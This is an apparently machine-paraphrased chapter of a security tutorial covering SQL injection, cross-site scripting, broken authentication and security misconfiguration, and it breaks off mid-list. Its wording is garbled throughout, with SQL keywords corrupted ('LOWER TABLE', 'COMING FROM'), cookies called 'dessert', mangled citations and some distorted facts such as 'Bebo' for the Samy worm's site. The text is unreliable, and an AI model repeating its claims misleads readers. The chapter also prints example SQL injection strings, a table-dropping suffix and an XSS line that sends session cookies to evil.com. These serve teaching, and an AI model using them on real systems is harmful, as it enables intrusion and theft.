Log in Subscribe

Threat Landscape and Common Vulnerabilities

Myrick Marsh
· 11 min read
Threat Landscape and Common Vulnerabilities

# Chapter 5: Threat Landscape plus Common Vulnerabilities
Every single application operates within an atmosphere full of threats – malicious actors constantly browsing for weaknesses to exploit. Understanding the risk landscape is vital for defense. Throughout this chapter, we'll survey the most common forms of software vulnerabilities and problems seen in the wild today. You will discuss how that they work, provide real-life samples of their fermage, and introduce very best practices to prevent them. This will put the groundwork for later chapters, which will certainly delve deeper directly into how to construct security straight into the development lifecycle and specific protection.


Over the decades, certain categories involving vulnerabilities have emerged as perennial issues, regularly appearing inside security assessments in addition to breach reports. Business resources just like the OWASP Top 10 (for web applications) plus CWE Top twenty-five (common weaknesses enumeration) list these normal suspects. Let's discover some of the major ones:

## Injection Attacks (SQL, Command Injection, and so on. )
- **Description**: Injection flaws take place when an app takes untrusted input (often from a good user) and nourishes it into an interpreter or order in a manner that alters typically the intended execution. Typically the classic example is definitely SQL Injection (SQLi) – where customer input is concatenated into an SQL query without proper sanitization, allowing you provide their own SQL commands. Similarly, Command Injection involves treating OS commands, LDAP Injection into LDAP queries, NoSQL Shot in NoSQL data source, and so on. Essentially, the application form does not work out to distinguish data from code instructions.

- **How it works**: Consider some sort of simple login type that takes a good account information. If the server-side code naively constructs a question just like: `SELECT * COMING FROM users WHERE user name = 'alice' PLUS password = 'mypassword'; `, an assailant can input a thing like `username: alice' OR '1'='1` and `password: anything`. The cake you produced SQL would get: `SELECT * BY users WHERE login = 'alice' OR EVEN '1'='1' AND password = 'anything'; `. The `'1'='1'` problem always true can make the problem return all customers, effectively bypassing typically the password check. This particular is a fundamental sort of SQL injections to force a login.
More maliciously, an attacker could terminate the issue and add `; LOWER TABLE users; --` to delete the users table (a destructive attack on integrity) or `; SELECT credit_card BY users; --` to dump sensitive data (a confidentiality breach).
- **Real-world impact**: SQL injection has been behind a number of the largest data breaches on record. Many of us mentioned the Heartland Payment Systems infringement – in 2008, attackers exploited a great SQL injection inside a web application to ultimately penetrate internal systems and rob millions of credit card numbers​
TWINGATE. COM
. Another circumstance: the TalkTalk 2015 breach in the UK, exactly where a teenager applied SQL injection to reach the personal info of over a hundred and fifty, 000 customers. The particular subsequent investigation exposed TalkTalk had kept an obsolete web site with an acknowledged SQLi flaw on the web, and hadn't patched a database vulnerability from 2012​
ICO. ORG. UK

ICO. ORG. BRITISH
. TalkTalk's CEO detailed it as the basic cyberattack; certainly, SQLi was well-understood for a ten years, yet the company's failure to sanitize inputs and upgrade software triggered the serious incident – they were fined and suffered reputational loss.
These illustrations show injection problems can compromise discretion (steal data), integrity (modify or delete data), and supply (if data is definitely wiped, service is disrupted). Even today, injection remains a common attack vector. In fact, OWASP's 2021 Top Ten still lists Treatment (including SQL, NoSQL, command injection, and so on. ) as a best risk (category A03: 2021)​
IMPERVA. COM
.
- **Defense**: The primary defense towards injection is input validation and output escaping – ensure that any untrusted information is treated as pure data, never as code. Applying prepared statements (parameterized queries) with bound variables is the gold standard with regard to SQL: it divides the SQL program code through the data beliefs, so even when an user makes its way into a weird string, it won't crack the query composition. For example, by using a parameterized query inside Java with JDBC, the previous get access query would be `SELECT * THROUGH users WHERE login name =? AND password =? `, plus the `? ` placeholders are certain to user inputs safely (so `' OR EVEN '1'='1` would end up being treated literally while an username, which usually won't match any kind of real username, somewhat than part regarding SQL logic). Identical approaches exist regarding other interpreters.
Upon top of of which, whitelisting input affirmation can restrict what characters or formatting is allowed (e. g., an login name could be restricted in order to alphanumeric), stopping numerous injection payloads from the front door​
IMPERVA. COM
. Likewise, encoding output correctly (e. g. HTML CODE encoding to avoid script injection) is definitely key, which we'll cover under XSS.
Developers should never ever directly include natural input in commands. Secure frameworks in addition to ORM (Object-Relational Mapping) tools help by simply handling the problem building for an individual. Finally, least benefit helps mitigate effect: the database bank account used by the app should have only necessary rights – e. g. it will not have got DROP TABLE legal rights if not necessary, to prevent a great injection from carrying out irreparable harm.

## Cross-Site Scripting (XSS)
- **Description**: Cross-Site Scripting identifies a class of vulnerabilities where an app includes malicious canevas within the context involving a trusted site. Unlike injection straight into a server, XSS is about treating to the content that will other users see, typically in the web page, causing victim users' browsers to execute attacker-supplied script. At this time there are a couple of types of XSS: Stored XSS (the malicious script will be stored on typically the server, e. g. inside a database, and served to additional users), Reflected XSS (the script is reflected off the hardware immediately in a reaction, often using a search query or problem message), and DOM-based XSS (the susceptability is in client-side JavaScript that insecurely manipulates the DOM).

- **How that works**: Imagine some text board where customers can post remarks. If the program will not sanitize CODE tags in responses, an attacker could post a review like: ` var i=new Image(); i. src="http://evil.com/steal?cookie="+document.cookie; `. Any end user who views that will comment will by mistake run the screenplay in their web browser. The script over would send the particular user's session dessert to the attacker's server (stealing their particular session, hence permitting the attacker to be able to impersonate them on the site – a confidentiality and integrity breach).
Within a reflected XSS circumstance, maybe the web-site shows your suggestions with an error webpage: in case you pass some sort of script in the URL plus the site echoes it, that will execute inside the browser of anyone who clicked that harmful link.
Essentially, XSS turns the victim's browser into a great unwitting accomplice.
- **Real-world impact**: XSS can be really serious, especially on highly trusted websites (like social networks, webmail, banking portals). Some sort of famous early instance was the Samy worm on Web sites in 2005. An individual can named Samy learned a stored XSS vulnerability in Bebo profiles. He constructed a worm: a script that, when any user looked at his profile, this would add your pet as a good friend and copy the particular script to the particular viewer's own user profile. Like that, anyone different viewing their account got infected as well. Within just 20 hours of launch, over one mil users' profiles acquired run the worm's payload, making Samy one of the fastest-spreading viruses of time​
EN. WIKIPEDIA. ORG
. Typically the worm itself simply displayed the expression "but most of all, Samy will be my hero" in profiles, a relatively harmless prank​
EN. WIKIPEDIA. ORG
. However, it absolutely was a wake-up call: if the XSS worm may add friends, it could just just as quickly create stolen exclusive messages, spread junk e-mail, or done other malicious actions upon behalf of consumers. Samy faced legitimate consequences for this specific stunt​
EN. WIKIPEDIA. ORG
.
In another scenario, XSS can be used to hijack accounts: regarding instance, a reflected XSS inside a bank's site may be exploited via a phishing email that techniques an user straight into clicking an LINK, which then executes a script to transfer funds or steal session tokens.
XSS vulnerabilities need been found in internet sites like Twitter, Facebook (early days), and countless others – bug bounty applications commonly receive XSS reports. Although many XSS bugs are of moderate severity (defaced UI, etc. ), some can be essential if they allow administrative account takeover or deliver malware to users.
- **Defense**: The essence of XSS defense is output development. Any user-supplied content material that is shown inside a page need to be properly escaped/encoded so that that should not be interpreted since active script. For example, in the event that an end user writes ` bad() ` in a remark, the server need to store it and after that output it since `< script> bad()< /script> ` and so that it comes up as harmless text message, not as the actual script. Modern day web frameworks usually provide template search engines that automatically break free variables, which inhibits most reflected or stored XSS by simply default.
Another essential defense is Content Security Policy (CSP) – a header that instructs internet browsers to only execute intrigue from certain options. A well-configured CSP can mitigate the impact of XSS by blocking inline scripts or external scripts that aren't explicitly allowed, though CSP can be intricate to set right up without affecting site functionality.
For builders, it's also crucial to prevent practices like dynamically constructing CODE with raw data or using `eval()` on user suggestions in JavaScript. Internet applications can in addition sanitize input in order to strip out disallowed tags or characteristics (though this really is difficult to get perfect). In summary: confirm and sanitize any kind of HTML or JavaScript inputs, use context-appropriate escaping (HTML get away from for HTML articles, JavaScript escape for data injected straight into scripts, etc. ), and consider permitting browser-side defenses like CSP.

## Damaged Authentication and Period Management
- **Description**: These vulnerabilities include weaknesses in just how users authenticate to the application or even maintain their authenticated session. "Broken authentication" can mean many different issues: allowing weak passwords, not avoiding brute force, declining to implement appropriate multi-factor authentication, or exposing session IDs. "Session management" will be closely related – once an end user is logged in, the app normally uses a session cookie or token to consider them; if that mechanism is flawed (e. grams. predictable session IDs, not expiring periods, not securing the particular cookie), attackers may hijack other users' sessions.

- **How it works**: 1 common example is definitely websites that made overly simple pass word requirements or experienced no protection towards trying many passwords. Attackers exploit this kind of by using credential stuffing (trying username/password pairs leaked from all other sites) or incredible force (trying numerous combinations). If generally there are no lockouts or rate limits, an attacker can methodically guess credentials.
One more example: if a good application's session biscuit (the part of files that identifies a logged-in session) is usually not marked with all the Secure flag (so it's sent over HTTP as effectively as HTTPS) or even not marked HttpOnly (so it can easily be accessible to scripts), it would be taken via network sniffing at or XSS. When an attacker features a valid period token (say, thieved from an unsafe Wi-Fi or through an XSS attack), they might impersonate of which user without requiring credentials.
There possess also been reason flaws where, intended for instance, the password reset functionality is definitely weak – probably it's susceptible to an attack where a good attacker can reset to zero someone else's username and password by modifying variables (this crosses directly into insecure direct item references / gain access to control too).
Total, broken authentication addresses anything that allows an attacker in order to either gain qualifications illicitly or avoid the login making use of some flaw.
rapid **Real-world impact**: We've all seen news of massive "credential dumps" – millions of username/password sets floating around coming from past breaches. Attackers take these in addition to try them on other services (because a lot of people reuse passwords). This automated credential stuffing has guided to compromises regarding high-profile accounts about various platforms.
Among the broken auth was the case in this year where LinkedIn endured a breach and 6. 5 zillion password hashes (unsalted SHA-1) were leaked​
NEWS. SOPHOS. POSSUINDO

NEWS. SOPHOS. APRESENTANDO
. The weakened hashing meant opponents cracked most regarding those passwords within just hours​
NEWS. SOPHOS. COM

REPORTS. SOPHOS. APRESENTANDO
. Worse, a few decades later it switched out the breach was actually much larger (over a hundred million accounts). Folks often reuse account details, so that break the rules of had ripple outcomes across other websites. LinkedIn's failing has been in cryptography (they didn't salt or use a robust hash), which is part of protecting authentication data.
Another standard incident type: period hijacking. For instance, before most internet sites adopted HTTPS just about everywhere, attackers on the same network (like an open Wi-Fi) could sniff cookies and impersonate consumers – a risk popularized by Firesheep tool this year, which in turn let anyone bug on unencrypted periods for sites love Facebook. This forced web services to be able to encrypt entire sessions, not just login pages.
There are also cases of flawed multi-factor authentication implementations or login bypasses due to logic errors (e. g., an API that will returns different emails for valid versus invalid usernames could allow an assailant to enumerate customers, or even a poorly executed "remember me" expression that's easy to forge).  application security program  regarding broken authentication are usually severe: unauthorized entry to user balances, data breaches, identification theft, or unauthorized transactions.
- **Defense**: Protecting authentication needs a multi-pronged approach:
-- Enforce strong pass word policies but inside reason. Current NIST guidelines recommend allowing users to pick long passwords (up to 64 chars) and never requiring frequent changes unless there's indication of compromise​
JUMPCLOUD. COM

threat modeling . COM
. Instead, check passwords towards known breached password lists (to refuse "P@ssw0rd" and typically the like). Also inspire passphrases which are less difficult to remember although hard to figure.
- Implement multi-factor authentication (MFA). The password alone is often insufficient these types of days; providing a possibility (or requirement) for the second factor, such as an one-time code or perhaps a push notification, considerably reduces the chance of account endanger even if account details leak. Many major breaches could include been mitigated by simply MFA.
- Protected the session tokens. Use the Protected flag on snacks so they will be only sent above HTTPS, HttpOnly thus they aren't available via JavaScript (mitigating some XSS impact), and consider SameSite to prevent them from being directed in CSRF assaults (more on CSRF later). Make program IDs long, unique, and unpredictable (to prevent guessing).
-- Avoid exposing period IDs in Web addresses, because they can be logged or leaked via referer headers. Always prefer snacks or authorization headers.
- Implement bank account lockout or throttling for login tries. After say five to ten failed attempts, possibly lock the account for a period or even increasingly delay replies. Also use CAPTCHAs or perhaps other mechanisms if automated attempts are detected. However, end up being mindful of denial-of-service – some sites opt for smoother throttling to prevent letting attackers lock out users by simply trying bad security passwords repeatedly.
- Period timeout and logout: Expire sessions after having a reasonable period regarding inactivity, and totally invalidate session bridal party on logout. It's surprising how many apps in the past didn't properly invalidate server-side program records on logout, allowing tokens to become re-used.
- Pay attention to forgot password runs. Use secure bridal party or links by way of email, don't uncover whether an end user exists or not necessarily (to prevent end user enumeration), and ensure those tokens terminate quickly.
Modern frames often handle some sort of lot of this for you personally, but misconfigurations are routine (e. gary the gadget guy., a developer may well accidentally disable a security feature). Normal audits and checks (like using OWASP ZAP or various other tools) can get issues like missing secure flags or weak password guidelines.
Lastly, monitor authentication events. Unusual designs (like a single IP trying a huge number of a, or one bank account experiencing numerous hit a brick wall logins) should raise alarms. This overlaps with intrusion recognition.
To emphasize, OWASP's 2021 list telephone calls this category Identity and Authentication Downfalls (formerly "Broken Authentication") and highlights typically the importance of items like MFA, not using default credentials, in addition to implementing proper username and password handling​
IMPERVA. APRESENTANDO
. They note that 90% of software tested had concerns in this area in a few form, which is quite mind boggling.

## Security Misconfiguration
- **Description**: Misconfiguration isn't just one susceptability per se, but a broad class of mistakes in configuring the app or its surroundings that lead to be able to insecurity. This may involve using predetermined credentials or configurations, leaving unnecessary functions enabled, misconfiguring safety headers, or not solidifying the server. Basically, the software could be secure in idea, but the way it's deployed or set up opens a pit.

- **How it works**: Examples involving misconfiguration:
- Leaving behind default admin accounts/passwords active. Many computer software packages or equipment historically shipped together with well-known defaults